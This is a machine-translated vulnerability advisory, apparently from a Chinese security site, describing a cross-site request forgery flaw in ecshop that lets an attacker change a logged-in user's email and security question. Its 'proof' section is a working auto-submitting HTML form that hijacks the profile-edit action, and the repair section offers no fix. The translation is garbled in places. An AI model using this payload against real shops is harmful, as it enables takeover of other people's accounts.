"ecshop modify any user password vulnerability"of the CSRF exploit-vulnerability warning-the black bar safety net

ID MYHACK58:62201337396
Type myhack58
Reporter 佚名
Modified 2013-02-19T00:00:00


Brief description:

ecshop in the design of the authentication mechanism when there is a problem, resulting in malicious users can steal other user's password, this process can be byxssand csrf to achieve

Demo For:http://www. tick. org/bugs. php? action=view&id=3 9 5

Detailed description:

The use of csrf andxsscan break the official said the“obstacles” xssversion of someone already described This gives the csrf version

Vulnerability proof:

the <html> the <body> <form action="http://www.wooyun.org/ecshop/user.php" method="POST"> <INPUT TYPE="text" NAME="email" value="hack@wooyun.org"> <INPUT TYPE="text" NAME="act" value="act_edit_profile"> <INPUT TYPE="text" NAME="sel_question" value="ecshop"> <INPUT TYPE="text" NAME="passwd_answer" value="exploit"> </body> the <script> document. forms[0]. submit(); </script> </html>

Structure of the web page, the user in the login case to access the page will cause the email as well as some other security information is lost

Repair solutions:

You know